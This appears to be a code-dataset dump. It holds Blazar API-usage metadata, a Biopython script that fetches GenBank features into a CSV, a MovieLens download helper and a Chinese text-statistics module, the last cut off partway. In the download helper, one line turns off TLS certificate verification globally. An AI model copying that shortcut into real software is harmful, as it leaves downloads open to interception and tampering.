"name"}, {"api_name": "blazar.db.api.device_list", "line_number": 250, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 250, "usage_type": "name"}, {"api_name": "blazar.db.utils.get_reservations_by_device_id", "line_number": 264, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 264, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 265, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 265, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 266, "usage_type": "attribute"}, {"api_name": "blazar.db.utils.get_plugin_reservation", "line_number": 269, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 269, "usage_type": "name"}, {"api_name": "blazar.utils.plugins.convert_requirements", "line_number": 272, "usage_type": "call"}, {"api_name": "blazar.utils.plugins", "line_number": 272, "usage_type": "name"}, {"api_name": "blazar.db.api.device_update", "line_number": 291, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 291, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_get_all_per_name", "line_number": 301, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 301, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_update", "line_number": 308, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 308, "usage_type": "name"}, {"api_name": "blazar.db.exceptions.BlazarDBException", "line_number": 310, "usage_type": "attribute"}, {"api_name": "blazar.db.exceptions", "line_number": 310, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_destroy", "line_number": 314, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 314, "usage_type": "name"}, {"api_name": "blazar.db.exceptions.BlazarDBException", "line_number": 316, "usage_type": "attribute"}, {"api_name": "blazar.db.exceptions", "line_number": 316, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_create", "line_number": 331, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 331, "usage_type": "name"}, {"api_name": "blazar.db.exceptions.BlazarDBException", "line_number": 332, "usage_type": "attribute"}, {"api_name": "blazar.db.exceptions", "line_number": 332, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.CantAddExtraCapability", "line_number": 336, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 336, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.ExtraCapabilityNotFound", "line_number": 340, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 340, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 348, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 348, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.DeviceNotFound", "line_number": 350, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 350, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 352, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 352, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.CantDeleteDevice", "line_number": 354, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 354, "usage_type": "name"}, {"api_name": "blazar.db.api.device_destroy", "line_number": 360, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 360, "usage_type": "name"}, {"api_name": "blazar.db.exceptions.BlazarDBException", "line_number": 362, "usage_type": "attribute"}, {"api_name": "blazar.db.exceptions", "line_number": 362, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.CantDeleteDevice", "line_number": 363, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 363, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 370, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 370, "usage_type": "name"}, {"api_name": "blazar.status.reservation", "line_number": 375, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 375, "usage_type": "name"}, {"api_name": "blazar.db.api.lease_update", "line_number": 377, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 377, "usage_type": "name"}, {"api_name": "blazar.db.api.lease_update", "line_number": 380, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 380, "usage_type": "name"}, {"api_name": "blazar.db.api.reservation_update", "line_number": 382, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 382, "usage_type": "name"}, {"api_name": "blazar.db.api.reservation_get", "line_number": 392, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 392, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 393, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 393, "usage_type": "name"}, {"api_name": "blazar.db.api.lease_get", "line_number": 395, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 395, "usage_type": "name"}, {"api_name": "blazar.status.reservation", "line_number": 398, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 398, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 399, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 399, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 404, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 404, "usage_type": "attribute"}, {"api_name": "blazar.db.api.device_allocation_destroy", "line_number": 410, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 410, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_update", "line_number": 416, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 416, "usage_type": "name"}, {"api_name": "blazar.status.reservation", "line_number": 420, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 420, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 421, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 421, "usage_type": "name"}, {"api_name": "blazar.db.api.device_list", "line_number": 428, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 428, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 465, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 465, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 466, "usage_type": "attribute"}, {"api_name": "blazar.db.utils.get_reservation_allocations_by_device_ids", "line_number": 468, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 468, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.NotEnoughHostsAvailable", "line_number": 503, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 503, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.MissingParameter", "line_number": 510, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 510, "usage_type": "name"}, {"api_name": "oslo_utils.strutils.is_int_like", "line_number": 511, "usage_type": "call"}, {"api_name": "oslo_utils.strutils", "line_number": 511, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.MalformedParameter", "line_number": 514, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 514, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.MalformedParameter", "line_number": 521, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 521, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.InvalidRange", "line_number": 524, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 524, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.MissingParameter", "line_number": 532, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 532, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.MalformedParameter", "line_number": 537, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 537, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 551, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 553, "usage_type": "call"}, {"api_name": "blazar.utils.plugins.convert_requirements", "line_number": 557, "usage_type": "call"}, {"api_name": "blazar.utils.plugins", "line_number": 557, "usage_type": "name"}, {"api_name": "blazar.db.api.reservable_device_get_all_by_queries", "line_number": 559, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 559, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 564, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 564, "usage_type": "name"}, {"api_name": "blazar.db.utils.get_free_periods", "line_number": 567, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 567, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 578, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 582, "usage_type": "call"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 598, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 598, "usage_type": "name"}, {"api_name": "blazar.status.reservation", "line_number": 606, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 606, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.NotEnoughHostsAvailable", "line_number": 607, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 607, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_create", "line_number": 621, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 621, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 624, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 624, "usage_type": "name"}, {"api_name": "blazar.status.reservation", "line_number": 625, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 625, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.NotEnoughHostsAvailable", "line_number": 631, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 631, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_destroy", "line_number": 634, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 634, "usage_type": "name"}, {"api_name": "blazar.db.utils.get_reserved_periods", "line_number": 650, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 650, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 654, "usage_type": "call"}, {"api_name": "blazar.utils.plugins.convert_requirements", "line_number": 680, "usage_type": "call"}, {"api_name": "blazar.utils.plugins", "line_number": 680, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get_all_by_queries", "line_number": 682, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 682, "usage_type": "name"}, {"api_name": "blazar.db.api.device_list", "line_number": 684, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 684, "usage_type": "name"}, {"api_name": "blazar.plugins.monitor.GeneralMonitorPlugin", "line_number": 687, "usage_type": "attribute"}, {"api_name": "blazar.plugins.monitor", "line_number": 687, "usage_type": "name"}, {"api_name": "blazar.db.utils.get_reservations_by_device_ids", "line_number": 704, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 704, "usage_type": "name"}, {"api_name": "blazar.db.api.unreservable_device_get_all_by_queries", "line_number": 709, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 709, "usage_type": "name"}, {"api_name": "blazar.db.api.device_update", "line_number": 728, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 728, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get_all_by_filters", "line_number": 737, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 737, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 739, "usage_type": "call"}]} +{"seq_id": "566549998", "text": "# fetch_features.py version 1.0\n# Created by Ivan Munoz-Gutierrez\n# Date 2020-07-26\n#\n# Function:\n# This program needs the Biophyton and cs50 modules. If you don't have those\n# modules, please visit https://biopython.org/ and\n# https://github.com/cs50/python-cs50 for more information.\n#\n# The program fetches information from a list of Genebank accession numbers or\n# a list of BioSample numbers. The program enters the nuccore database and\n# collects all the features of the corresponding list of accession numbers.\n# When you enter a list of accession numbers you have two options. The first\n# option is to get the features of the provided accession list. The second one\n# is to get the features of all the accession numbers associated with an\n# specific BioSample number. In this second option, the program gets the\n# BioSample number of every accession number in the list, accesses the nuccore\n# database with the BioSample number and selects the most updated information\n# of every molecule (chromosome and/or plasmid(s)).\n#\n# You can create one list of accession numbers in Excel by saving the file as\n# txt. The list needs a header, if it doesn't have one the first accession\n# numbers is not going to be included.\n#\n# Usage: python fetch_features.py\n\n#############################################################################\n# Importing relevant modules #\n#############################################################################\nfrom Bio import Entrez\nfrom Bio import SeqIO\nfrom database import *\nimport csv\nimport sys\nimport cs50\n\n#############################################################################\n# Getting input from the user #\n#############################################################################\n# Checking the correct useage of the program\nif len(sys.argv) != 1:\n sys.exit(\"usage: python fetch_features.py\")\n\n# Getting type of input data.\nwhile True:\n type_list = cs50.get_string(\n \"Does your list have accession numbers or \"\n \"biosample numbers (accession or biosample)? \")\n type_list = type_list.lower()\n if type_list == 'accession' or type_list == 'biosample':\n break\n\n# Asking about getting data from all BioSample related acc numbers\nwhile True:\n get_biosample = cs50.get_string(\n \"If you have a list of accession numbers, do you want to get the \"\n \"most updated features of \\nall the related accession numbers that \"\n \"belong to the same BioSample (yes or no)? \")\n get_biosample = get_biosample.lower()\n if get_biosample == 'yes' or get_biosample == 'no':\n break\n\n# Gettin name of infile.txt\ninfile = cs50.get_string('Provide the name of your infile.txt: ')\n\n# IMPORTANT: always provide your email address to GenBank\nemail_address = cs50.get_string(\"Provide your email address to the NCBI: \")\nEntrez.email = email_address\n\n# Opening infile.txt\nwith open(infile, 'r') as reader:\n\n # Skip the header\n next(reader)\n\n # Creating a list of accession numbers\n list_accessions = reader.readlines()\n\n# Counting the number of results (number of sequences)\ncount = len(list_accessions)\nprint(f\"Number of requested sequences: {count}\")\n\n# Creating batches of acc numbers for the specified case in the if statement\nif type_list == 'accession' and get_biosample == 'no':\n # Number of sequences to be requested by batch.\n # A batch of 500 is the max that we can request.\n batch_size = 100\n\n # This is going to be a list of strings containg the batches of requested\n # accession numbers, i.e. every string in the list is going to have in this\n # case 500 accesion numbers separaded by comas.\n submission_list = []\n\n # Counter to access the list_accessions\n counter_accessions = 0\n\n # Loop to create the list of accession numbers by batches of 500\n for start in range(0, count, batch_size):\n end = min(count, start + batch_size)\n # This list is going to save temporarily the batch of accession numbers\n # that are goingo to be converted into a string separed by commas\n set_list = []\n for set in range(start, end):\n set_list.append(list_accessions[counter_accessions].\n replace('\\n', ''))\n counter_accessions += 1\n # Converting the list into string\n set_list = ','.join(set_list)\n submission_list.append(set_list)\n\n#############################################################################\n# Working with GenBank #\n#############################################################################\n# Number to keep track set of sequences (or batches) and the sequences,\n# it is important in case the connection to NCBI is interrupted so we can\n# know where to continue downloading\nset, seq_counter = 1, 1\n\n# Opening our results file to write the fetched data in csv format\nwith open(\"results.csv\", \"w\") as results:\n # Field names or headers in the csv table\n fields = [\"set_batch\", \"counter\", \"description\", \"accession\", \"size\",\n \"molecule\", \"mod_date\", \"topology\", \"mol_type\", \"organism\",\n \"strain\", \"isolation_source\", \"host\", \"plasmid\", \"country\",\n \"lat_lon\", \"collection_date\", \"note\", \"serovar\", \"collected_by\",\n \"genotype\", \"BioProject\", \"BioSample\", \"Assem_Method\",\n \"Gen_Coverage\", \"Seq_Technol\"]\n\n # Create DictWriter\n writer = csv.DictWriter(results, fields)\n\n # Writing headers\n writer.writeheader()\n\n ###########################################\n # Workig with a list of accession numbers #\n ###########################################\n if type_list == 'accession' and get_biosample == 'no':\n # Declaring end\n end = 0\n\n # Fetching the information from GenBank by batches\n for submission in range(len(submission_list)):\n start = end\n # submission_list is a list of accession numbers separated by\n # commas. Therefore, the number of commas indicate the number of\n # accession numbers.\n end = end + submission_list[submission].count(',') + 1\n\n # Printing download batch record\n print(\"Going to download record %i to %i\" % (start + 1, end))\n\n # Posting the submission_list.\n # Because we are requesting information from a huge list of acc\n # numbers, we have to use the \".epost\" function which uploads a\n # list of UIs (acc numbers) for use in subsequent searches.\n # From .epost we can get the QueryKey and the WebEnv which define\n # our history session and can be used to performe searches of data.\n posting = Entrez.epost('nuccore', id=submission_list[submission])\n search_results = Entrez.read(posting)\n\n # Copying cookie \"WebEnv\" and query \"QueryKey\" from our history\n # session to keep track of our batch fetching.\n # WevEnv -> Web environment string returned from a previous\n # ESearch, EPost or ELink call; QueryKey -> Integer query key\n # returned by a previous ESearch, EPost or ELink call\n webenv = search_results[\"WebEnv\"]\n query_key = search_results[\"QueryKey\"]\n\n # Getting the batch information\n # db -> database, nuccore -> nuleotide, rettype -> retrieval type\n # retmode -> determines the format of the return output\n # retstart -> sequential index of the first UID in the retrieved\n # set to be shown in the XML output\n # retmax -> total number of UIDs from the retrieved set to be shown\n # in the XML output\n # idtype-> specifies the type of identifier to return for sequence\n # databases, acc -> accesion number\n fetch_handle = Entrez.efetch(\n db=\"nuccore\",\n rettype=\"gb\",\n retmode=\"text\",\n retstart=0,\n retmax=batch_size,\n webenv=webenv,\n query_key=query_key,\n idtype=\"acc\"\n )\n\n # Parsing the data fetched from NCBI\n records = parser(fetch_handle, set, seq_counter)\n\n # Recording the number set and sequences downloded\n set += 1\n seq_counter = records[1]\n\n # Saving the retrived data in the csv file\n for i in range(len(records[0])):\n writer.writerow(records[0][i])\n\n # Closing fetch_handle\n fetch_handle.close()\n\n ###################################################################\n # Workig with a list of accession numbers and getting all related #\n # BioSample associated accession numbers and their features #\n ###################################################################\n elif type_list == 'accession' and get_biosample == 'yes':\n seq_counter = 1\n\n # Iterating over the list of accession numbers\n for query in range(len(list_accessions)):\n # Number to keep track set of sequences (or batches) and the\n # sequences, it is important in case the connection to NCBI is\n # interrupted so we can know where to continue downloading\n set = query + 1\n\n # Getting the BioSample number of the requested accession number.\n # BioSample() gets two arguments, a list of accession numbers and\n # the email address of the user\n biosample_number = BioSample_list(list_accessions[query],\n email_address)\n\n # Using \".esearch\" to find the information.\n # Also we have to implement \"usehistory\" to get the cookie and\n # query key.\n # db -> database to search, term -> Entrez text query\n search_handle = Entrez.esearch(db=\"nucleotide\",\n term=biosample_number,\n usehistory=\"y\")\n\n # Copying the information in computer memory\n search_results = Entrez.read(search_handle)\n\n # Closing the handle\n search_handle.close()\n\n # Counting the number of results (number of sequences)\n count = int(search_results[\"Count\"])\n print(f\"Number of requested sequences from BioSample: {count}\")\n\n # Copying cookie \"WebEnv\" and query \"QueryKey\" from history to keep\n # track of our batch fetching.\n # WevEnv -> Web environment string returned from a previous\n # ESearch, EPost or ELink call.\n # QueryKey -> Integer query key returned by a previous ESearch,\n # EPost or ELink call\n webenv = search_results[\"WebEnv\"]\n query_key = search_results[\"QueryKey\"]\n\n # Number of sequences to be requested by batch.\n # A batch of 500 is the max that we can request.\n batch_size = 500\n\n # I need to think about how to clean features of a BioSample number\n # that has more than 500 records\n # TODO\n\n # Fetching the information from GenBank by batches\n for start in range(0, count, batch_size):\n end = min(count, start + batch_size)\n\n # Printing download batch record\n print(f\"Going to download record {start + 1} to {end} \"\n f\"from set {query + 1}\")\n\n # Getting the batch information\n # db -> database, nuccore -> nuleotide, rettype -> retrieval\n # type, retmode -> determines the format of the return output\n # retstart -> sequential index of the first UID in the\n # retrieved set to be shown in the XML output, retmax -> total\n # number of UIDs from the retrieved set to be shown in the\n # XML output, idtype-> specifies the type of identifier to\n # return for sequence databases, acc -> accesion number\n fetch_handle = Entrez.efetch(\n db=\"nuccore\",\n rettype=\"gb\",\n retmode=\"text\",\n retstart=start,\n retmax=batch_size,\n webenv=webenv,\n query_key=query_key,\n idtype=\"acc\"\n )\n\n # Parsing the data fetched from NCBI\n records = parser(fetch_handle, set, seq_counter)\n\n # Recording the number of sequences downloded\n seq_counter = records[1]\n\n # Using dabase.py to clean data and obtain the most updated\n # information.\n # clean_features() returns a list of dictionaries\n uptaded_features = clean_features(records[0])\n\n # Saving the updated retrived data in the csv file\n for i in range(len(uptaded_features)):\n writer.writerow(uptaded_features[i])\n\n print(f\"Number of sequences saved after processing: \"\n f\"{len(uptaded_features)}\")\n\n # Closing handle\n fetch_handle.close()\n\n ############################################\n # Working with a list of BioSample numbers #\n ############################################\n else:\n lenght_acc_list = len(list_accessions)\n\n # Fetching the information from GenBank\n for submission in range(lenght_acc_list):\n\n # Printing download record\n print(f\"Going to download record {submission} \"\n f\"of {lenght_acc_list}\")\n\n # Searching for the BioSample accession number. We need usehistory\n # to get the QueryKey and the WebEnv which define our history\n # session and can be used to performe searches of data.\n search_handle = Entrez.esearch(db=\"nuccore\",\n term=list_accessions[submission],\n usehistory=\"y\")\n search_results = Entrez.read(search_handle)\n\n # Copying cookie \"WebEnv\" and query \"QueryKey\" from our history\n # session.\n # WevEnv -> Web environment string returned from a previous\n # ESearch, EPost or ELink call; QueryKey -> Integer query key\n # returned by a previous ESearch, EPost or ELink call\n webenv = search_results[\"WebEnv\"]\n query_key = search_results[\"QueryKey\"]\n\n # Getting information\n # db -> database, nuccore -> nuleotide, rettype -> retrieval type,\n # retmode -> determines the format of the return output,\n # retstart -> sequential index of the first UID in the retrieved\n # set to be shown in the XML output, retmax -> total number of\n # UIDs from the retrieved set to be shown in the XML output,\n # idtype-> specifies the type of identifier to return for sequence\n # databases, acc -> accesion number\n fetch_handle = Entrez.efetch(\n db=\"nuccore\",\n rettype=\"gb\",\n retmode=\"text\",\n retstart=0,\n retmax=1,\n webenv=webenv,\n query_key=query_key,\n idtype=\"acc\"\n )\n\n # Parsing the data fetched from NCBI\n records = parser(fetch_handle, submission + 1, submission + 1)\n\n # Saving the retrived data in the csv file\n for i in range(len(records[0])):\n writer.writerow(records[0][i])\n\n # Closing fetch_handle\n fetch_handle.close()\n\n# If everything was done OK print Done and exit the program\nprint(\"\"\"Done!\nYou should have a results.csv file in your folder\"\"\")\n\nsys.exit(0)\n", "sub_path": "fetch_features.py", "file_name": "fetch_features.py", "file_ext": "py", "file_size_in_byte": 15988, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 42, "usage_type": "call"}, {"api_name": "cs50.get_string", "line_number": 46, "usage_type": "call"}, {"api_name": "cs50.get_string", "line_number": 55, "usage_type": "call"}, {"api_name": "cs50.get_string", "line_number": 64, "usage_type": "call"}, {"api_name": "cs50.get_string", "line_number": 67, "usage_type": "call"}, {"api_name": "Bio.Entrez.email", "line_number": 68, "usage_type": "attribute"}, {"api_name": "Bio.Entrez", "line_number": 68, "usage_type": "name"}, {"api_name": "csv.DictWriter", "line_number": 130, "usage_type": "call"}, {"api_name": "Bio.Entrez.epost", "line_number": 159, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 159, "usage_type": "name"}, {"api_name": "Bio.Entrez.read", "line_number": 160, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 160, "usage_type": "name"}, {"api_name": "Bio.Entrez.efetch", "line_number": 179, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 179, "usage_type": "name"}, {"api_name": "Bio.Entrez.esearch", "line_number": 228, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 228, "usage_type": "name"}, {"api_name": "Bio.Entrez.read", "line_number": 233, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 233, "usage_type": "name"}, {"api_name": "Bio.Entrez.efetch", "line_number": 275, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 275, "usage_type": "name"}, {"api_name": "Bio.Entrez.esearch", "line_number": 323, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 323, "usage_type": "name"}, {"api_name": "Bio.Entrez.read", "line_number": 326, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 326, "usage_type": "name"}, {"api_name": "Bio.Entrez.efetch", "line_number": 344, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 344, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 369, "usage_type": "call"}]} +{"seq_id": "6465440", "text": "import os\nimport ssl\nimport wget\nimport zipfile\n\nimport numpy as np\nimport pandas as pd\n\n\ndef download_and_prepare(name, path):\n if name == \"movielens-small\":\n print(f\"Preparing dataset {name}...\")\n # Check if data has been extracted and if not download extract it\n if (os.path.exists(os.path.join(path, \"ml-latest-small\"))):\n print(f\"Dataset {name} already extracted.\")\n else:\n print(f\"Downloading dataset {name}...\")\n ssl._create_default_https_context = ssl._create_unverified_context\n url = \"https://files.grouplens.org/datasets/movielens/ml-latest-small.zip\"\n wget.download(url, path)\n print(f\"Extracting dataset {name}...\")\n with zipfile.ZipFile(os.path.join(path, \"ml-latest-small.zip\"), 'r') as zip_ref:\n zip_ref.extractall(path)\n\n # Read dataset with pandas\n ratings = pd.read_csv(os.path.join(path, 'ml-latest-small', 'ratings.csv'))\n print(f\"{len(ratings)} entries read.\")\n r_matrix = ratings.pivot(index='userId', columns='movieId', values='rating').fillna(0)\n\n return np.array(r_matrix) # for performance reasons we only take every 2nd element along each axis\n\n else:\n raise ValueError\n\n", "sub_path": "Detection and Pattern Recognition/Ex_1_Introduction/datasets.py", "file_name": "datasets.py", "file_ext": "py", "file_size_in_byte": 1267, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.exists", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "ssl._create_default_https_context", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ssl._create_unverified_context", "line_number": 18, "usage_type": "attribute"}, {"api_name": "wget.download", "line_number": 20, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "619870833", "text": "\"\"\"\n This file is about the statistical analysis on the sentences.\n\n We basically specify that:\n '我们爱您' is a string;\n Both '我' and '们' are the units of the string '我们爱您'.\n At the same time, we specify that:\n '我' is a char;\n '我们' is a phrase;\n '我们爱您' is a sentence;\n '1' is a digit;\n 'a' is a letter;\n '!' is a punctuation.\n Besides,special_words mean the followings:\n Word/Flag:\n 助词/u\n 叹词/e\n 语气词/y\n 拟声词/o\n\n Here is the list of the functions:\n stc_len -- 句子长度\n stc_phrase_count -- 词频统计\n stc_char_count -- 字频统计\n stc_digit_count -- 阿拉伯数字(0-9)使用频率统计\n stc_letter_count -- 英文字母(含大小写)使用频率统计\n stc_punct_count1 -- 标点符号使用频率统计(利用jieba分词)\n stc_punct_count2 -- 标点符号使用频率统计(利用正则表达式)\n\"\"\"\n\nimport jieba\nimport jieba.posseg\nimport string\nimport re\nfrom collections import Counter\n\n# stc == sentence\ndef stc_len(sentence):\n return len(sentence)\n\ndef stc_phrase_count(sentence):\n phrase_list = jieba.lcut(sentence, cut_all = False)\n cnt = Counter(phrase_list)\n return dict(cnt)\n\ndef stc_char_count(sentence):\n unit_list = list(sentence)\n cnt = Counter(unit_list)\n return dict(cnt)\n\n# This counts the digit from 0 to 9,\n# and digit_num contains all the digit from 0 to 9, of which value may be 0.\ndef stc_digit_count(sentence):\n #initialize\n digit_num = dict(Counter(string.digits))\n for d in digit_num:\n digit_num[d] -= 1\n #process\n unit_list = list(sentence)\n for u in unit_list:\n if u in digit_num:\n digit_num[u] += 1\n return digit_num\n\n# This counts the letter from a to z, and A to Z,\n# and letter_num contains all the letter from a to z, and A to Z, of which value may be 0.\ndef stc_letter_count(sentence):\n #initialize\n letter_num = dict(Counter(string.ascii_letters))\n for l in letter_num:\n letter_num[l] -= 1\n #process\n unit_list = list(sentence)\n for u in unit_list:\n if u in letter_num:\n letter_num[u] += 1\n return letter_num\n\n# This counts the punctuation character in the local file common_zh_punct,\n# and punct_num contains all the punctuations mentioned above, of which value may be 0.\ndef stc_punct_count(sentence):\n #initialize\n f = open('common_zh_punct', 'r', encoding='UTF-8')\n punct_num = dict(Counter(f.readline().encode('utf-8').decode('utf-8-sig')))\n for p in punct_num:\n punct_num[p] -= 1\n #process\n unit_list = list(sentence)\n for u in unit_list:\n if u in punct_num:\n punct_num[u] += 1\n f.close()\n return punct_num\n\n# This counts the special words,\n# and special_words_num doesn't contain all the special words in the world.\ndef stc_special_words_count(sentence):\n words = jieba.posseg.lcut(sentence)\n special_words_num = {}\n for w in words:\n if w.flag[0] == 'u' or w.flag[0] == 'e' or w.flag[0] == 'y' or w.flag[0] == 'o':\n if w.word not in special_words_num:\n special_words_num[w.word] = 1\n else:\n special_words_num[w.word] += 1\n return special_words_num\n\n# This counts the popular phrases,\n# and pop_phrase_num does contain all the popular phrases we collected manully,\n# but not contain all the popular phrases in the world, using jieba.\ndef stc_pop_phrase_count1(sentence):\n # initialize\n f = open('common_pop_phrase', 'r', encoding='UTF-8')\n lines = f.readlines()\n pop_phrases = []\n for i in lines:\n pop_phrases.append((i.encode('utf-8').decode('utf-8-sig'))[:-1])\n pop_phrase_num = dict(Counter(pop_phrases))\n for p in pop_phrase_num:\n pop_phrase_num[p] -= 1\n # process\n phrase_list = jieba.lcut(sentence, cut_all=False)\n print(phrase_list)\n for p in phrase_list:\n if p in pop_phrase_num:\n pop_phrase_num[p] += 1\n f.close()\n return pop_phrase_num\n\n# This counts the popular phrases,\n# and pop_phrase_num does contain all the popular phrases we collected manully,\n# but not contain all the popular phrases in the world, using RE.\ndef stc_pop_phrase_count2(sentence):\n # initialize\n f = open('common_pop_phrase', 'r', encoding='UTF-8')\n lines = f.readlines()\n pop_phrases = 